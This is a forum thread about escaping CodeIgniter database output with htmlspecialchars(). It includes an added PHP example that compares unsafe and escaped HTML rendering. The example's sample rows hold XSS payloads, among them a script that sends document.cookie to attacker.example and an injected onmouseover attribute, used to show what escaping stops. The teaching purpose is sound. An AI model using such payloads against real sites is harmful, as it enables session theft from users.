Display data securely which comes from the database
#1

For a query with
PHP Code:
$this->db->query($sql, array( $var )); 
superglobals must be bound when used. But is it safe in CodeIgniter when I read data from the database and then display it? I usually do that with htmlspecialchars(); how do I handle it now in CodeIgniter?
Reply
#2

You should still use htmlspecialchars() and similar functions. CodeIgniter does not format, escape or filter the database output for you.

What it does, when using the Query Builder Class, is escape your queries that insert/update data in the database.
Reply
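The point made in #2 is worth seeing side by side: query bindings stop SQL injection on the way into the database, but a stored payload comes back out exactly as it was saved, and only output escaping stops it from becoming XSS. The following is an added example, not code from the thread or from CodeIgniter; the rows are constructed sample data standing in for a result set, and the helper name e() is an arbitrary choice so the file runs without a database.

```php
<?php
// Added example (not from the forum thread or from CodeIgniter itself):
// escaping database output before it is echoed into HTML.
// The rows below are constructed sample data standing in for what
// $this->db->query($sql, array($var))->result_array() might return;
// no database connection is needed to run this file.

// Query bindings protected the INSERT from SQL injection, so the payloads
// were stored verbatim. Reading them back does nothing to neutralise them.
$rows = [
    ['username' => 'alice',
     'bio'      => 'Likes <b>bold</b> text & "quotes"'],
    ['username' => 'mallory',
     'bio'      => '<script>document.location="https://attacker.example/?c="+document.cookie</script>'],
    // Attribute-context payload: breaks out of data-user="..." if unescaped.
    ['username' => 'x" onmouseover="alert(1)',
     'bio'      => 'attribute-context payload'],
];

// Escaper for HTML text nodes and quoted attribute values.
//  - ENT_QUOTES: escapes both ' and ", so the same helper is safe inside
//    single- or double-quoted attributes.
//  - ENT_SUBSTITUTE: replaces invalid UTF-8 with U+FFFD instead of returning
//    an empty string, which would otherwise silently drop the whole field.
//  - The explicit charset keeps the result independent of default_charset.
// (e() is a hypothetical helper name chosen for this example.)
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// VULNERABLE: echoing database output straight into markup.
// CodeIgniter does not escape result data for you.
function render_unsafe(array $row): string
{
    return '<div data-user="' . $row['username'] . '">' . $row['bio'] . '</div>';
}

// HARDENED: every value interpolated into HTML passes through e().
function render_safe(array $row): string
{
    return '<div data-user="' . e($row['username']) . '">' . e($row['bio']) . '</div>';
}

foreach ($rows as $row) {
    echo 'unsafe: ' . render_unsafe($row) . PHP_EOL;
    echo 'safe:   ' . render_safe($row) . PHP_EOL . PHP_EOL;
}
```

Run it with `php` from the command line and compare the two lines per row: in the unsafe output the `<script>` element and the injected `onmouseover` attribute survive intact, while in the safe output they are inert entities. Note that htmlspecialchars() is the right tool only for HTML text and attribute contexts; a value placed inside a JavaScript string, a URL, or a CSS block needs a context-specific encoder (for example json_encode() with the hex flags for JavaScript, or rawurlencode() for URL components) rather than HTML entity escaping.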
#3

Thanks a lot!
Reply